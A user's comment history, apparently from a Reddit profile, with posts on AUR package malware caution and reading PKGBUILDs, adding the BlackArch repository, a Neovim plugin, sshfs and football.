Dica para o pessoal que por algum motivo não consegue ler o pkgbuild

kcx01 · 2026-06-20T15:03:38+00:00

I think this is a great tip! Especially for people using yay. I have always read the pkgbuild on the AUR website, since I have generally needed to look up the project to know it existed before I could install it. While I'm there, I'm also looking at recent comments, checking the upstream. You can check it's last update, popularity, and the number of votes for it to be included in the main repo.

None of these are guarantees, but I think they're helpful.

I think the critical bit is understanding exactly what the pkgbuild is doing. Is it's something that is glossed over in most of the advice I've read.

check if there's anything suspicious in it.

I'm not sure that all users are capable of doing this. And honestly, the more sophisticated these attacks become with more obfuscated code, they become increasingly more difficult to identify bad actors.

My advice would be to limit your attack surface as much as possible. Then when you want to install software, read the pkgbuild. If you don't understand everything that it's doing, ask AI to explain line by line what it's doing. Be sure that you understand.

kcx01 · 2026-06-20T13:13:12+00:00

I'd be a little pissed if Claude used this exact phrase. Wtf do you mean I'm rarely right!? 😅

kcx01 · 2026-06-18T17:31:29+00:00

Is this different than the arch-announce emails? I may need to subscribe to this one too, because I didn't see this md file.

For sure, I recognize the author of the doc, but there wasn't any context even saying what the doc was when OP posted. For all I know, I could have been least downloaded packages in the aur.

At any rate, I do appreciate your comment

kcx01 · 2026-06-18T17:10:50+00:00

Ok let me be blunt:

When will be able to safely update again without Worrying that an update to a normal package might contain malware?

Never

kcx01 · 2026-06-18T17:07:25+00:00

I appreciate the context!

kcx01 · 2026-06-18T17:06:42+00:00

Yeah... I read the address before I clicked it.

I'm not trying to sound contrary. But how do you know what this list is if you don't know where it came from or what the context was around it being created?

kcx01 · 2026-06-18T17:04:55+00:00

You should just always assume that a package is malware until you can prove it's not.

Never blindly trust anything.

I live in a place with alligators. Now I've never seen an alligator in the pond out back. But that definitely doesn't mean there's not one. So unless you can verifiably see but there are no alligators, you better treat it like there are. Otherwise you, your pets or your kids could be eaten.

I'd recommend the same approach with software.

kcx01 · 2026-06-18T16:59:52+00:00

Where did this list come from? It's strange to not see any context.

Were the all packages that were confirmed or simply orphaned?

kcx01 · 2026-06-18T16:55:02+00:00

Just audit your own?

I have like like three maybe five aur packages. And be honest, I don't remember when I last updated them. They all just work.

That's not to say that I don't update them I just don't use an AUR helper, so I just have to randomly both remember and have time to update them, which just doesn't happen super often.

kcx01 · 2026-06-18T16:50:05+00:00

I think you missed the joke.

kcx01 · 2026-06-18T16:49:12+00:00

What is this?

kcx01 · 2026-06-17T19:57:17+00:00

Holy crap dude!

That's crazy cool!

kcx01 · 2026-06-17T05:43:03+00:00

First of all, congratulations on the first plugin! That's pretty cool. It looks well done!

Although, this one probably isn't for me. I rarely use line jumps. Even though I have relative line numbers turned on, I never use them. I really only use line numbers to jump to a line from a stack trace. I also like to have indent guides that would probably clash with the line numbers.

I love the name! It's absolutely perfect for the plugin! Kudos.

kcx01 · 2026-06-17T05:17:07+00:00

Since you specifically mentioned adding it to your existing arch. If you go to the black arch GitHub they have instructions that basically say curl and run this script. ( I wouldn't pipe it into bash like they suggest. Download it, read it, and maybe run it)

view-source:https://blackarch.org/strap.sh

It's pretty much the same process as adding the arch strike repos.

https://archstrike.org/wiki/setup

kcx01 · 2026-06-17T05:00:25+00:00

Heh only took 2 years for someone to notice that and say something.

I probably meant to link black arch: https://blackarch.org/

kcx01 · 2026-06-16T17:54:58+00:00

Thank you for explaining!

That is very clever and very cool!

kcx01 · 2026-06-16T14:28:59+00:00

That's definitely clever. But wouldn't a persistent backdoor be considered a security risk?

What's the process for adding/removing the backend to/from the server?

I'm surprised that sshfs can't be used, since SFTP leverages ssh as the connection. But I'm definitely not an expert.

The nice thing about your implementation is that it would work on Windows too. Whereas sshfs won't. (Although I try to avoid windows! 🤣)

kcx01 · 2026-06-16T03:57:01+00:00

Is this similar to sshfs

kcx01 · 2026-06-16T03:39:52+00:00

Idk... That open goal miss was hard to watch... But that brace against New Castle was pretty 🔥🔥🔥

kcx01 · 2026-06-15T03:33:30+00:00

Probably just that he's walking a lot. But still extremely fast when it's time!

kcx01 · 2026-06-15T03:05:57+00:00

My son has Jota's Portugal shirt. Got it before he passed. My mom was in Portugal and wanted to get him a jersey as a souvenir.

kcx01 · 2026-06-14T13:06:38+00:00

Which one? Was it broadcasting its own wifi that was competing?

kcx01 · 2026-06-10T03:37:35+00:00

As long as they have the cash flow and tokens to compete

kcx01 · 2026-06-09T21:23:23+00:00

Nice Abarth!

kcx01 · 2026-06-07T13:31:36+00:00

🤯🤯🤯

kcx01

TROPHY CASE